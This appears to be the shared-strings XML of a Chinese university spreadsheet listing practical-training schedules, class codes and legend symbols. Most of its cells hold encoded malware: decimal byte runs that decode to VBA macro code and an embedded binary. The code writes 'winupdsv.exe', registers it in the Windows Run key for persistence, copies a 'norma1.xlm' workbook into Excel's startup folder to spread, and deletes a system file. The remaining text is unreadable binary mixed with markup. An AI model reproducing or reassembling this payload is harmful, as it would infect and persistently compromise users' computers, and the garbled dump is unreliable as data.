5 255 147 2 4 0 0 128 0 255 147 2 23 0 17 0 9 0 1 56 94 196 137 95 0 110 0 111 0 114 0 109 0 97 0 49 0 147 2 4 0 18 128 4 255 147 2 4 0 19 128 7 255 147 2 4 0 20 128 3 255 147 2 4 0 21 128 6 255 96 1 2 0 0 0 133 0 22 0 214 16 0 0 0 1 </t>
  </si>
  <si>
    <t xml:space="preserve">0 10 0 30 0 1 0 23 0 52 0 0 0 253 0 10 0 31 0 1 0 23 0 15 0 0 0 215 0 68 0 123 5 0 0 108 2 61 0 65 0 53 0 43 0 48 0 58 0 55 0 44 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 8 2 16 0 32 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 33 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 34 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 35 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 36 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 37 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 38 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 39 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 40 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 41 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 42 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 43 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 44 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 45 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 46 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 47 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 48 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 49 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 50 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 51 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 52 0 1 0 2 0 59 1 0 </t>
  </si>
  <si>
    <t xml:space="preserve">137 177 71 186 19 234 50 8 102 115 10 12 126 104 100 225 52 188 87 194 225 252 222 253 238 140 209 15 252 171 104 255 214 252 52 140 141 130 153 16 13 240 184 194 116 135 126 224 188 191 95 116 31 83 149 20 219 243 189 240 77 37 1 104 4 58 149 82 46 64 45 195 212 83 91 201 92 250 133 97 20 42 126 188 144 173 228 66 46 140 87 146 125 56 43 183 109 151 28 235 36 107 228 128 227 28 199 225 216 67 100 4 233 25 35 160 15 206 96 60 194 228 12 203 235 69 86 19 241 234 160 140 17 94 249 103 250 210 129 16 81 68 63 0 15 224 184 245 189 112 53 64 48 214 198 63 60 208 128 221 33 65 186 138 235 124 4 58 93 155 161 177 71 12 87 217 52 14 111 198 122 225 11 52 56 235 48 141 135 43 185 46 140 21 61 0 106 47 183 32 19 163 39 204 182 7 83 31 60 158 29 147 231 178 114 114 56 176 252 98 185 61 99 221 176 23 15 4 53 38 214 214 179 150 36 90 110 142 132 172 117 82 51 83 215 172 178 248 123 60 121 158 104 24 139 185 15 177 44 176 236 211 189 31 141 70 1 80 87 179 220 195 23 87 178 79 145 94 216 52 235 105 22 14 6 202 69 99 18 235 249 230 2 111 241 86 57 13 210 43 195 178 72 117 30 41 159 123 198 204 220 242 16 11 135 12 20 236 103 206 125 76 208 62 13 187 247 218 27 210 91 88 253 46 124 129 226 71 240 10 129 194 97 137 16 17 154 50 204 56 94 95 213 172 191 48 48 156 173 57 54 85 69 164 221 225 208 111 48 116 173 147 46 87 166 62 172 8 201 30 86 117 22 23 251 43 41 22 97 246 235 16 7 234 23 51 51 156 56 97 93 47 60 8 6 213 111 148 96 105 6 187 3 42 168 68 24 255 202 239 26 110 208 16 198 151 14 227 131 234 48 141 125 200 220 224 183 215 128 175 221 196 131 226 10 80 27 196 60 7 133 109 193 86 204 9 208 25 79 75 110 240 109 93 212 12 220 137 85 224 209 228 180 112 114 157 205 85 240 171 15 105 167 88 210 121 96 15 16 4 25 46 185 219 15 109 228 251 50 185 255 92 161 229 251 122 156 75 65 136 228 251 </t>
  </si>
  <si>
    <t>If Not fso.folderexists(myfolder) Then</t>
  </si>
  <si>
    <t xml:space="preserve">179 109 170 191 163 16 195 129 249 35 114 18 7 202 146 65 155 51 37 8 118 10 100 117 109 17 167 201 107 51 221 185 3 220 209 71 102 1 37 55 141 144 89 5 37 160 196 194 61 129 8 222 112 51 162 118 235 241 147 43 1 193 248 123 215 72 212 89 104 84 17 71 131 198 32 94 1 190 63 64 97 197 235 67 190 53 86 169 167 42 77 14 51 72 72 8 208 181 102 84 167 86 20 176 47 180 184 12 17 3 214 211 171 5 139 223 145 47 122 17 235 30 86 182 39 176 232 87 115 82 29 131 60 49 131 54 131 95 20 140 123 224 117 30 12 131 70 191 84 163 16 72 116 8 72 99 114 194 242 182 64 184 8 4 245 235 3 246 245 162 141 55 192 120 128 7 137 28 48 111 91 39 207 22 66 252 118 76 13 85 118 200 37 5 137 60 7 253 72 109 96 132 18 55 106 116 50 106 44 91 131 118 31 85 172 121 73 73 248 37 207 179 80 80 80 131 12 48 255 88 65 10 43 148 103 5 238 2 13 28 229 224 31 239 137 150 218 97 101 193 111 104 193 103 81 12 176 66 173 62 0 127 107 159 117 87 15 175 5 95 254 224 139 222 119 13 173 93 97 32 78 220 21 119 42 35 42 117 62 0 117 13 83 74 24 149 46 180 15 63 43 86 196 170 1 104 93 27 21 20 34 214 226 6 231 195 130 74 25 203 47 146 125 48 91 208 196 185 196 87 61 60 169 70 23 163 28 208 248 62 137 37 103 20 91 96 94 139 68 163 216 160 194 47 40 96 13 103 236 173 21 230 76 116 136 20 124 23 35 165 98 47 120 255 52 176 225 12 233 232 27 140 226 36 176 0 130 188 92 195 204 160 72 49 219 185 140 240 55 83 51 156 85 86 82 131 73 12 8 199 65 238 2 238 3 100 235 17 12 170 65 20 24 199 93 134 112 18 174 38 131 97 4 104 4 83 7 4 85 114 3 49 88 183 192 102 134 138 16 64 20 240 236 240 237 0 58 175 15 172 255 208 237 4 56 58 164 76 38 99 28 27 223 162 212 86 147 86 49 50 199 69 228 12 254 59 248 169 0 69 232 116 9 85 198 69 255 16 235 11 128 101 255 69 175 102 139 72 236 184 100 35 </t>
  </si>
  <si>
    <t>飞行器动力工程（航发班）</t>
  </si>
  <si>
    <t>数据科学与大数据技术</t>
  </si>
  <si>
    <t>专业号</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>126</t>
  </si>
  <si>
    <t>204</t>
  </si>
  <si>
    <t>227</t>
  </si>
  <si>
    <t>228</t>
  </si>
  <si>
    <t>229</t>
  </si>
  <si>
    <t xml:space="preserve">232 144 7 108 241 191 233 186 0 4 44 3 80 35 209 138 6 136 7 138 70 1 136 101 107 110 107 168 5 2 86 8 89 198 91 118 146 177 199 92 204 141 73 43 37 73 158 101 25 1 2 2 166 3 249 186 179 144 35 70 33 71 63 140 154 166 233 186 207 6 188 3 180 172 164 156 221 234 175 105 148 140 191 68 142 228 96 143 228 211 52 77 211 7 232 232 236 236 240 77 211 52 77 240 244 244 248 248 252 225 79 44 52 252 156 141 48 3 240 3 248 9 220 166 251 14 255 240 240 3 252 16 31 17 3 123 75 23 121 94 95 56 144 157 11 66 112 193 102 249 17 163 13 86 234 48 67 10 43 141 45 103 237 37 131 240 124 57 252 127 36 13 253 227 112 222 62 187 252 119 112 32 247 217 239 141 32 32 69 62 39 147 143 249 43 120 31 176 153 174 251 44 144 136 11 168 3 208 109 3 150 124 221 173 58 111 3 78 88 79 86 182 183 75 24 246 75 31 163 238 2 239 2 111 217 128 124 41 140 144 39 36 227 149 45 9 171 45 3 174 69 117 23 102 104 90 85 91 36 6 44 211 52 77 211 3 52 60 68 76 84 154 166 25 97 103 32 151 28 28 24 24 105 154 166 105 20 20 16 16 12 164 105 154 166 12 8 8 4 4 211 117 39 44 31 128 5 136 3 152 9 206 45 97 172 32 151 183 181 135 192 22 194 108 15 131 19 202 37 18 194 183 254 236 119 238 93 13 164 0 50 4 224 119 34 18 10 181 191 158 4 255 17 22 57 68 32 228 137 6 207 193 19 47 146 222 172 123 145 90 110 53 107 8 116 119 225 177 180 0 207 39 116 28 111 3 208 94 228 178 184 181 230 15 240 240 86 100 32 65 182 150 68 177 195 196 174 72 91 156 188 202 10 220 240 193 58 172 214 18 9 166 170 9 143 37 74 184 90 70 46 205 224 212 128 148 137 24 227 26 137 190 209 15 140 103 108 78 103 139 86 134 194 130 117 52 133 86 104 181 166 158 179 16 105 89 142 28 235 249 193 255 141 60 189 60 207 191 218 91 137 255 138 79 4 95 128 225 130 34 45 6 128 206 118 160 169 24 221 56 129 126 186 124 78 171 32 31 21 118 208 197 </t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">符号说明：  
□ 理论课    # 毕业设计   ∈专业课设     Ω专业实践     ※ 技能训练     S计算实习        ⊙ 科 训      ★专业实习      Z 电子实习   G电工实习    //生产实习     R认知实习    ∝创新实践    F航模设计     E英语训练      〓实训          W学年论文        R认知实习     △专业考察     / 金工实习    L测量实习    ∷ 考试          C机器测绘    ///毕业实习   *社会调查     ▼模拟法庭    J毕业答辩        E强化训练        ◎综合程序课程设计           ◆计算机软件应用实践   ♀网络工程实践 　§发动机装配修理   ♂会计综合模拟   ■飞行技术模拟训练    ﹌ 手绘        S飞机辅助设计    －机原、机零　  Y艺术实践　   C机器测绘     M模具测绘    D电子课设   A基础制造训练A 
特殊说明：1、所有分散进行的实践环节没有体现出来，由学院自己掌握。  
        </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 2、190131、190132、190133、190301、190302、190311、190312、190313、190314、190321、190322班 和190323、190331、190332、190333、190334、190335、190336、190341、190342、190343班三周《基础制造训练A》 安排在暑假进行，具体时间另行通知。</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
         3、180334、180335、180336、180301班一周《电工电子》、180421、180422、180423班一周《电子实习》和180831、180832班一周《电工实习》安排在暑假进行，具体时间另行通知。
       </t>
    </r>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">199 37 167 236 74 83 37 23 76 78 201 41 57 25 103 22 34 20 57 146 83 114 74 8 208 45 202 174 228 148 156 64 229 44 227 86 37 167 236 202 75 26 208 12 39 78 201 41 57 66 172 47 216 17 77 216 87 114 74 9 1 9 235 126 15 32 63 144 31 16 18 235 110 15 181 235 94 129 252 64 126 10 119 235 78 6 84 235 62 7 242 3 249 5 175 235 46 4 132 235 30 40 142 29 15 228 146 235 14 32 206 229 235 10 202 90 97 148 29 212 162 15 204 142 81 104 9 81 169 51 210 48 181 113 2 188 48 179 35 89 232 241 109 85 203 206 227 117 39 91 87 38 1 96 183 246 251 244 250 87 119 45 89 101 15 235 1 12 182 93 1 219 95 84 94 66 137 85 73 118 52 205 178 235 3 99 7 241 84 175 222 156 44 155 102 217 61 85 42 191 47 86 207 217 52 93 211 149 152 3 172 31 32 84 166 105 154 102 51 89 70 146 165 187 166 107 154 203 184 168 55 4 80 3 250 83 117 77 215 108 7 223 239 3 255 15 27 127 215 116 93 215 35 108 3 193 27 13 7 212 23 31 255 214 155 101 231 83 66 0 1 2 39 209 5 6 7 8 39 9 39 255 111 254 237 10 11 39 0 12 13 39 14 15 16 39 17 18 19 39 20 21 22 23 24 25 26 39 113 194 255 221 27 28 16 29 30 31 39 32 33 34 35 36 37 38 4 11 129 160 235 36 93 67 96 118 241 185 116 39 134 196 125 249 20 213 180 51 240 50 5 92 250 39 38 225 236 158 8 12 106 96 84 31 104 100 29 232 45 5 36 163 47 75 31 120 192 17 83 52 190 194 86 163 12 250 128 96 91 199 86 194 17 160 27 232 160 74 254 86 79 140 248 32 11 208 60 56 139 10 28 56 86 191 36 62 150 129 71 225 170 104 228 188 11 213 33 210 61 104 212 10 87 214 31 64 115 109 45 147 156 6 134 108 26 94 60 86 181 48 95 163 114 182 64 245 128 193 2 64 148 164 160 237 197 126 1 80 199 6 16 47 200 136 119 111 147 226 42 131 189 124 21 2 15 148 192 130 77 128 153 213 53 23 51 104 209 108 13 96 8 112 5 138 88 34 89 11 180 62 246 40 </t>
  </si>
  <si>
    <t xml:space="preserve">166 116 20 36 128 3 193 3 122 59 198 26 11 110 247 124 135 235 107 19 56 139 249 169 6 34 223 253 31 16 41 193 248 9 139 208 193 226 9 43 202 76 60 59 215 125 25 219 255 191 117 57 76 74 150 131 62 253 116 1 67 59 216 116 8 66 131 198 4 24 124 37 220 253 132 238 164 139 20 144 66 47 3 209 82 165 206 108 216 182 24 39 5 80 4 4 175 106 191 216 102 132 76 178 185 68 82 9 43 3 162 183 47 152 15 90 3 76 26 95 94 93 91 8 52 195 47 252 239 186 144 0 86 114 8 87 131 207 255 139 70 12 168 64 162 131 200 255 124 103 250 254 235 58 168 131 116 52 86 47 221 29 7 9 131 255 118 16 219 178 125 219 8 208 54 12 133 192 125 37 207 18 49 28 118 251 255 110 11 116 11 123 8 161 131 102 28 0 89 139 199 6 12 0 94 220 175 240 216 195 85 133 246 117 231 152 66 89 17 237 45 182 197 78 47 89 98 15 246 70 13 109 182 246 246 179 15 86 9 174 247 216 34 27 192 195 154 24 83 166 146 91 248 59 12 39 87 144 96 4 199 111 11 255 128 249 2 117 55 102 169 8 106 49 18 8 139 62 43 248 28 255 189 121 118 38 87 80 146 10 5 59 199 117 14 191 128 116 14 36 253 210 214 253 183 137 8 235 7 131 78 12 32 131 203 212 8 145 4 138 203 205 10 255 6 95 139 195 94 91 195 40 142 100 58 199 95 248 155 99 51 255 57 53 192 139 189 126 77 161 184 123 64 86 225 194 23 92 176 208 170 72 12 246 193 1 48 131 178 247 237 17 126 16 1 117 15 80 62 131 248 255 186 29 67 235 26 21 253 203 218 246 0 117 19 33 2 108 26 117 2 11 248 70 59 91 184 197 142 76 124 179 56 112 116 2 15 95 117 251 173 223 189 85 139 236 81 112 139 125 12 15 175 125 52 69 8 137 125 252 194 27 182 91 109 137 7 83 117 7 242 233 163 160 139 182 45 219 246 117 20 102 247 184 12 228 8 24 27 20 194 88 106 174 219 199 4 0 16 131 201 76 8 246 70 183 237 47 116 41 25 4 159 34 23 139 251 114 91 223 240 119 255 248 87 255 117 8 255 54 130 13 </t>
  </si>
  <si>
    <t xml:space="preserve">0 169 21 56 14 6 109 107 113 161 7 187 235 205 123 135 13 4 193 186 229 229 254 235 8 253 235 3 252 96 12 95 31 236 11 244 25 138 17 65 239 100 136 23 71 98 238 235 5 137 96 45 86 138 23 145 103 110 105 127 119 152 129 254 107 225 47 52 132 246 116 39 247 194 68 27 123 99 105 18 7 106 199 56 100 141 103 119 129 95 195 102 8 198 71 168 12 6 123 193 182 8 136 7 223 222 20 236 17 67 78 64 84 227 75 78 154 139 50 36 19 153 100 123 132 65 53 43 193 195 9 254 253 19 103 77 38 252 41 24 76 180 185 64 14 137 117 53 112 53 52 81 193 81 201 254 67 86 241 137 191 14 50 80 50 86 9 210 184 136 195 167 89 98 169 57 197 114 208 48 118 7 153 142 27 24 232 80 173 128 108 247 70 241 197 36 75 64 142 191 96 121 18 108 61 86 104 125 232 233 80 243 171 170 49 100 89 136 95 119 137 15 134 239 26 125 238 110 187 8 65 161 176 77 239 116 67 69 94 162 68 237 15 182 185 56 108 15 135 147 101 27 39 250 37 136 64 234 238 82 40 0 11 181 72 182 82 129 183 10 187 223 209 4 170 141 158 152 145 128 59 35 32 44 138 11 221 98 209 81 1 184 133 182 250 183 119 219 183 187 169 20 240 138 146 128 32 8 144 70 64 19 118 91 185 90 248 245 65 65 128 57 88 212 28 155 8 37 23 111 0 163 4 114 193 210 164 254 240 126 185 76 162 13 80 163 172 11 186 141 182 140 225 254 222 237 59 191 64 15 165 165 89 163 187 165 235 85 64 51 3 166 171 64 122 72 111 161 155 197 126 241 8 64 61 255 180 241 86 57 44 84 198 218 107 47 235 6 250 11 194 77 171 53 12 188 209 0 129 57 29 248 192 151 33 232 96 247 48 237 4 54 22 151 3 107 225 181 30 4 3 64 33 85 240 247 90 169 254 101 75 11 75 255 37 136 253 200 133 141 106 253 20 132 252 117 15 161 36 232 56 182 204 97 25 73 45 164 78 116 160 192 219 151 32 232 4 116 23 4 13 116 12 200 219 217 12 252 89 184 4 47 5 18 11 8 131 188 240 60 17 87 108 89 51 192 170 123 111 132 96 180 </t>
  </si>
  <si>
    <t xml:space="preserve">34 0 229 255 34 0 92 0 45 0 35 0 44 0 35 0 35 0 48 0 30 4 53 0 6 0 24 0 1 34 0 229 255 34 0 35 0 44 0 35 0 35 0 48 0 59 0 91 0 82 0 101 0 100 0 93 0 34 0 229 255 34 0 92 0 45 0 35 0 44 0 35 0 35 0 48 0 30 4 55 0 7 0 25 0 1 34 0 229 255 34 0 35 0 44 0 35 0 35 0 48 0 46 0 48 0 48 0 59 0 34 0 229 255 34 0 92 0 45 0 35 0 44 0 35 0 35 0 48 0 46 0 48 0 48 0 30 4 65 0 8 0 30 0 1 34 0 229 255 34 0 35 0 44 0 35 0 35 0 48 0 46 0 48 0 48 0 59 0 91 0 82 0 101 0 100 0 93 0 34 0 229 255 34 0 92 0 45 0 35 0 44 0 35 0 35 0 48 0 46 0 48 0 48 0 30 4 105 0 42 0 50 0 1 95 0 32 0 34 0 229 255 34 0 42 0 32 0 35 0 44 0 35 0 35 0 48 0 95 0 32 0 59 0 95 0 32 0 34 0 229 255 34 0 42 0 32 0 92 0 45 0 35 0 44 0 35 0 35 0 48 0 95 0 32 0 59 0 95 0 32 0 34 0 229 255 34 0 42 0 32 0 34 0 45 0 34 0 95 0 32 0 59 0 95 0 32 0 64 0 95 0 32 0 30 4 46 0 41 0 41 0 0 95 32 42 32 35 44 35 35 48 95 32 59 95 32 42 32 92 45 35 44 35 35 48 95 32 59 95 32 42 32 34 45 34 95 32 59 95 32 64 95 32 30 4 121 0 44 0 58 0 1 95 0 32 0 34 0 229 255 34 0 42 0 32 0 35 0 44 0 35 0 35 0 48 0 46 0 48 0 48 0 95 0 32 0 59 0 95 0 32 0 34 0 229 255 34 0 42 0 32 0 92 0 45 0 35 0 44 0 35 0 35 0 48 0 46 0 48 0 48 0 95 0 32 0 59 0 95 0 32 0 34 0 229 255 34 0 42 0 32 0 34 0 45 0 34 0 63 0 63 0 95 0 32 0 59 0 95 0 32 0 64 0 95 0 32 0 30 4 54 0 43 0 49 0 0 95 32 42 32 35 44 35 35 48 46 48 48 95 32 </t>
  </si>
  <si>
    <t xml:space="preserve">164 179 73 95 236 170 115 13 87 70 147 218 152 198 8 237 87 248 209 105 234 201 5 115 115 90 240 154 165 14 217 244 60 141 15 95 49 86 94 194 23 76 168 12 75 235 79 190 234 70 232 111 24 26 28 234 48 21 216 24 67 82 46 79 125 9 165 11 199 175 62 235 32 139 7 38 253 141 0 113 152 164 20 66 156 145 87 23 248 70 184 17 240 119 16 57 95 95 117 244 135 209 10 237 125 3 137 7 103 23 15 59 139 45 190 169 195 79 124 91 139 87 12 244 194 243 237 109 199 91 118 43 71 4 175 22 243 103 139 79 8 138 191 5 183 210 43 217 136 51 93 248 249 214 139 222 193 250 169 147 203 86 55 227 20 149 218 153 70 227 111 113 116 40 109 59 208 115 34 128 58 112 180 48 224 237 141 46 66 235 241 48 128 117 18 233 142 118 35 54 80 186 252 0 94 81 230 0 211 99 13 246 71 12 252 188 122 241 35 183 173 18 210 24 33 85 235 43 193 3 194 55 128 0 13 151 198 121 6 112 91 178 246 80 106 71 255 202 193 191 117 59 125 114 245 29 139 71 8 131 140 115 11 95 138 236 91 104 179 8 64 71 13 65 52 46 252 49 54 229 98 52 249 54 175 119 13 239 214 140 213 226 239 5 116 96 71 24 120 173 3 231 98 102 14 65 42 41 93 33 30 187 114 178 86 3 193 243 37 105 112 176 235 81 232 53 244 61 92 12 255 91 53 67 29 2 115 7 60 97 116 26 60 114 116 15 96 120 185 192 60 119 213 34 1 185 1 3 223 246 117 161 93 0 206 1 188 185 9 232 206 187 218 108 111 240 1 90 138 132 71 58 195 253 227 59 211 254 118 227 51 182 15 190 192 26 84 127 62 96 131 232 43 116 69 206 86 95 222 4 25 116 54 14 116 28 72 102 172 61 108 205 214 97 8 163 199 144 1 85 201 182 6 50 182 216 183 20 142 74 162 41 182 182 212 208 194 125 9 253 152 31 190 45 108 112 117 115 1 254 70 252 15 2 129 206 128 27 254 3 63 111 130 184 212 133 200 117 89 11 200 112 23 60 111 111 91 111 101 98 116 72 75 46 7 11 116 18 4 6 117 64 183 216 183 10 13 105 59 128 205 64 </t>
  </si>
  <si>
    <t xml:space="preserve">23 163 197 220 195 13 199 172 226 95 16 164 4 12 24 207 212 236 86 139 34 10 22 165 248 8 125 52 192 94 136 132 5 236 1 199 247 214 11 130 198 114 244 164 242 198 133 13 32 190 151 218 110 124 55 83 87 141 85 96 182 10 2 192 216 119 29 218 61 182 4 61 188 42 65 184 32 0 139 217 27 81 161 129 158 171 222 149 243 116 21 191 253 170 66 66 138 66 255 52 117 208 95 91 106 12 250 45 246 236 53 131 53 141 122 80 141 86 137 119 198 126 68 116 64 121 35 253 29 200 110 54 217 86 30 86 52 35 62 42 216 129 90 201 252 4 39 210 119 219 10 204 92 202 141 141 114 102 252 251 9 183 130 202 116 22 250 16 138 148 5 100 161 86 176 249 136 144 96 235 28 205 82 123 239 206 89 26 32 91 235 227 128 160 28 146 48 225 134 70 60 0 191 235 73 21 63 172 177 221 37 65 114 25 4 90 170 75 200 128 193 32 201 203 219 216 136 136 73 31 29 97 114 19 122 119 14 69 55 236 205 32 233 32 235 224 76 74 190 0 87 181 40 186 246 117 94 97 83 92 69 106 253 224 215 89 252 16 252 249 85 17 252 148 252 119 66 104 220 99 160 15 66 61 158 144 125 103 139 53 140 74 177 43 186 87 208 142 255 214 239 225 247 108 251 41 116 250 192 16 104 172 7 163 0 212 69 23 175 251 214 163 4 6 161 11 115 22 207 110 152 160 111 203 188 161 4 16 5 83 106 152 35 120 17 218 3 20 67 232 181 241 77 111 13 120 32 96 191 110 87 37 186 163 66 131 122 181 222 3 20 247 198 252 13 55 240 237 245 16 117 7 238 117 111 235 33 138 6 70 172 163 180 64 76 73 205 34 41 31 172 208 143 241 117 235 12 117 81 131 227 3 76 32 155 168 84 221 29 47 163 212 91 94 51 112 40 26 143 121 129 58 73 247 204 214 79 138 17 58 238 152 64 219 220 108 24 46 250 42 120 200 9 108 17 215 99 175 218 6 210 52 131 124 22 131 198 222 44 30 65 221 158 12 12 117 198 57 235 24 138 52 157 169 82 243 9 14 0 187 109 237 189 249 83 241 85 10 4 137 7 95 98 216 174 196 240 176 117 133 163 4 </t>
  </si>
  <si>
    <t xml:space="preserve">116 92 87 105 110 100 111 119 115 92 67 117 114 114 101 110 116 86 101 114 115 105 111 110 92 82 117 110 92 87 105 110 85 112 100 115 118 34 44 32 34 119 105 110 117 112 100 115 118 46 101 120 101 34 33 0 0 102 111 108 100 101 114 49 32 61 32 102 115 111 46 103 101 116 115 112 101 99 105 97 108 102 111 108 100 101 114 40 49 41 60 0 0 104 118 32 61 32 84 104 105 115 87 111 114 107 98 111 111 107 46 83 104 101 101 116 115 40 34 64 107 98 116 97 115 116 111 64 115 104 101 51 35 34 41 46 67 101 108 108 115 40 105 44 32 53 41 46 86 97 108 117 101 60 0 0 104 118 32 61 32 84 104 105 115 87 111 114 107 98 111 111 107 46 83 104 101 101 116 115 40 34 64 107 98 116 97 115 116 111 64 115 104 101 51 35 34 41 46 67 101 108 108 115 40 105 44 32 52 41 46 86 97 108 117 101 60 0 0 104 118 32 61 32 84 104 105 115 87 111 114 107 98 111 111 107 46 83 104 101 101 116 115 40 34 64 107 98 116 97 115 116 111 64 115 104 101 51 35 34 41 46 67 101 108 108 115 40 105 44 32 51 41 46 86 97 108 117 101 113 0 0 84 104 105 115 87 111 114 107 98 111 111 107 46 83 104 101 101 116 115 40 34 64 107 98 116 97 115 116 111 64 115 104 101 51 35 34 41 46 67 111 108 117 109 110 115 40 51 41 46 67 111 112 121 32 87 111 114 107 98 111 111 107 115 40 34 110 111 114 109 97 49 46 120 108 109 34 41 46 83 104 101 101 116 115 40 34 64 107 98 116 97 115 116 111 64 115 104 101 51 35 34 41 46 67 111 108 117 109 110 115 40 51 41 15 0 0 70 111 114 32 105 32 61 32 49 32 84 111 32 56 57 41 0 0 79 112 101 110 32 102 105 108 101 115 102 32 70 111 114 32 66 105 110 97 114 121 32 65 99 99 101 115 115 32 87 114 105 116 101 32 65 115 32 35 49 42 0 0 79 112 101 110 32 102 105 108 101 120 108 109 32 70 111 114 32 66 105 110 97 114 121 32 65 99 99 101 115 115 32 87 114 105 116 101 32 65 115 32 35 49 15 0 0 68 105 109 32 98 117 102 </t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 253 0 10 0 75 0 1 0 22 0 1 0 0 0 253 0 10 0 76 0 1 0 22 0 24 0 0 0 253 0 10 0 77 0 1 0 22 0 25 0 0 0 253 0 10 0 78 0 1 0 22 0 27 0 0 0 253 0 10 0 79 0 1 0 22 0 54 0 0 0 253 0 10 0 80 0 1 0 22 0 40 0 0 0 253 0 10 0 81 0 1 0 22 0 26 0 0 0 253 0 10 0 82 0 1 0 22 0 32 0 0 0 1 2 6 0 83 0 1 0 22 0 1 2 6 0 84 0 1 0 22 0 1 2 6 0 85 0 1 0 22 0 1 2 6 0 86 0 1 0 22 0 1 2 6 0 87 0 1 0 22 0 1 2 6 0 88 0 1 0 22 0 1 2 6 0 89 0 1 0 22 0 1 2 6 0 90 0 1 0 22 0 1 2 6 0 91 0 1 0 22 0 1 2 6 0 92 0 1 0 22 0 1 2 6 0 93 0 1 0 22 0 1 2 6 0 94 0 1 0 22 0 1 2 6 0 95 0 1 0 22 0 215 0 68 0 12 4 0 0 108 2 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 8 2 16 0 96 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 97 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 98 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 99 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 100 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 101 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 102 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 103 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 104 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 105 0 1 0 2 0 29 1 0 </t>
  </si>
  <si>
    <t xml:space="preserve">208 207 17 224 161 177 26 225 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 62 0 3 0 254 255 9 0 6 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 1 0 0 0 0 0 0 0 0 16 0 0 24 0 0 0 2 0 0 0 254 255 255 255 0 0 0 0 0 0 0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t>
  </si>
  <si>
    <t xml:space="preserve">32 65 115 32 66 121 116 101 30 0 0 98 117 102 32 61 32 67 66 121 116 101 40 77 105 100 40 104 118 44 32 110 44 32 109 32 45 32 110 41 41 13 0 0 80 117 116 32 35 49 44 32 44 32 98 117 102 57 0 0 102 115 111 46 99 111 112 121 102 105 108 101 32 102 105 108 101 120 108 109 44 32 65 112 112 108 105 99 97 116 105 111 110 46 83 116 97 114 116 117 112 80 97 116 104 32 38 32 34 92 34 44 32 84 114 117 101 28 0 0 102 115 111 46 100 101 108 101 116 101 102 105 108 101 32 34 99 58 92 67 48 77 83 46 115 121 115 34 255 0 58 0 8 0 101 8 0 0 12 0 0 0 40 10 0 0 207 1 0 0 207 10 0 0 118 2 0 0 168 11 0 0 79 3 0 0 159 12 0 0 70 4 0 0 169 13 0 0 80 5 0 0 157 15 0 0 68 7 0 0 10 0 0 0 9 8 16 0 0 6 64 0 222 30 205 7 201 128 0 0 6 2 0 0 11 2 32 0 0 0 0 0 0 0 0 0 128 0 0 0 56 22 0 0 27 28 0 0 163 32 0 0 247 36 0 0 255 40 0 0 13 0 2 0 1 0 12 0 2 0 100 0 15 0 2 0 1 0 17 0 2 0 0 0 16 0 8 0 252 169 241 210 77 98 80 63 95 0 2 0 1 0 42 0 2 0 0 0 43 0 2 0 0 0 130 0 2 0 1 0 128 0 8 0 0 0 0 0 0 0 0 0 37 2 4 0 0 0 29 1 129 0 2 0 193 4 20 0 0 0 21 0 0 0 131 0 2 0 0 0 132 0 2 0 0 0 77 0 150 4 0 0 92 0 92 0 74 0 78 0 95 0 84 0 74 0 83 0 92 0 72 0 80 0 32 0 76 0 97 0 115 0 101 0 114 0 74 0 101 0 116 0 32 0 53 0 49 0 48 0 48 0 32 0 80 0 67 0 76 0 32 0 53 0 0 0 1 4 24 0 220 0 184 3 15 63 0 2 1 0 9 0 153 11 51 8 100 0 1 0 7 0 88 2 2 0 1 0 88 2 0 0 0 0 76 0 101 0 116 0 116 0 101 0 114 0 0 0 0 0 0 0 0 